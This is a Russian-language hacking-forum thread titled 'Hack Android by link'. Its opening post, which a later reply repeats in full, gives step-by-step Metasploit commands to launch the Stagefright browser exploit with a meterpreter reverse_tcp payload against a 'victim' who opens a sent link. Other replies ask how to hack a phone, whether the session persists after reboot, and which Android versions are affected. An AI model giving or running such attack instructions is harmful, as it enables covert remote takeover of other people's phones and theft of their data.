Взлом андроида по ссылке

[25517]

Копипаст,но интересный как по мне

Всем привет!! Сегодня покажу как взломать любой телефон, на базе андроид.
Суть этого взлома в том, что жертве нужно кинуть только ссылку и никанких apk файлов не нужно. Погнали
Что нам понадобиться:
1) Кали линукс
2) Встроеная в кали программа metasploit
Приступаем к взлому:
1) Открываем терминал и пишем команду для запуска metasploit ->msfconsole
2) Нужно выбрать експлоит( Stagefright)--> use exploit/android/browser/stagefright_mp4_tx3g_64bit
3) Нужно указать параметры експлоита-->
set SRVHOST ваш айпи(его можно узнать командой ifconfig)
set set PAYLOAD linux/armle/meterpreter/reverse_tcp // указываем полезную нагрузку експлоита
set LHOST ваш айпи // хост для полезной нагрузки
set VERBOSE true
exploit -j // запускаем експлоит

4) Ваша ссылка будет здесь -> "Using URL: ваша ссылка"

Когда жертва откроет ссылку у вас появиться открытая сессия meterpreter:

 

[Forchainik]

set set PAYLOAD linux/armle/meterpreter/reverse_tcp // указываем полезную нагрузку експлоита

Очень полезная статья, только непонятно что это.

 

[edy]

Очень полезная статья, только непонятно что это.

Стигаешь)))))))))) полезно, но не понятно))). Посмотри на ютубе ролики, что такое Kali Linux сначало..)

 

[Game Over]

Кто может подробно всё это обьяснить?
Срочно нужно.

 

[Forchainik]

Стигаешь)))))))))) полезно, но не понятно))). Посмотри на ютубе ролики, что такое Kali Linux сначало..)

Спасибо обязательно ознакомлюсь с информацией перед тем, как что-то напишу.

 

[JerryHerrer]

Ясности мало, я как новичек , не смог разобраться .

 

[ggg331]

Кто может подробно всё это обьяснить?
Срочно нужно.

в ютубе напиши "овер бафер" его крайний видос про это.

 

[danaforevr]

Если пользователь закроет сайт,сессия закроеться?
С какими версиями андроида работает?

 

[Game Over]

в ютубе напиши "овер бафер" его крайний видос про это.

Мне телефон нужно взломать, а не комп

 

[denishul]

Пробовал на смартфоне с 6 андроидом, в терминале ip отстукивает, но сессия почему-то не открывается, видать способ устарел

 

[NameL]

Пробовал на смартфоне с 6 андроидом, в терминале ip отстукивает, но сессия почему-то не открывается, видать способ устарел

Может именно с вашим устройством не получилось)

 

[cupertin]

Копипаст,но интересный как по мне

Всем привет!! Сегодня покажу как взломать любой телефон, на базе андроид.
Суть этого взлома в том, что жертве нужно кинуть только ссылку и никанких apk файлов не нужно. Погнали
Что нам понадобиться:
1) Кали линукс
2) Встроеная в кали программа metasploit
Приступаем к взлому:
1) Открываем терминал и пишем команду для запуска metasploit ->msfconsole
2) Нужно выбрать експлоит( Stagefright)--> use exploit/android/browser/stagefright_mp4_tx3g_64bit
3) Нужно указать параметры експлоита-->
set SRVHOST ваш айпи(его можно узнать командой ifconfig)
set set PAYLOAD linux/armle/meterpreter/reverse_tcp // указываем полезную нагрузку експлоита
set LHOST ваш айпи // хост для полезной нагрузки
set VERBOSE true
exploit -j // запускаем експлоит

4) Ваша ссылка будет здесь -> "Using URL: ваша ссылка"
Посмотреть вложение 7316
Когда жертва откроет ссылку у вас появиться открытая сессия meterpreter:
Посмотреть вложение 7320

Не ну ты конечно приколист, написал бы уже что делать дальше, а так по сути как бы взломал и как бы нихуя не взломал

 

[Hitreno]

Не пострадает стабильность если запихнуть другой пайлоад, т.к. этому что-то не нравится. Ответьте, если ещё актуально

 

[enima]

Метерпретер отличная штука, но вопрос тоже у меня, остается ли сессия если пользователь закрыл сайт! и после перегрузки телефона сессию можно восстановить?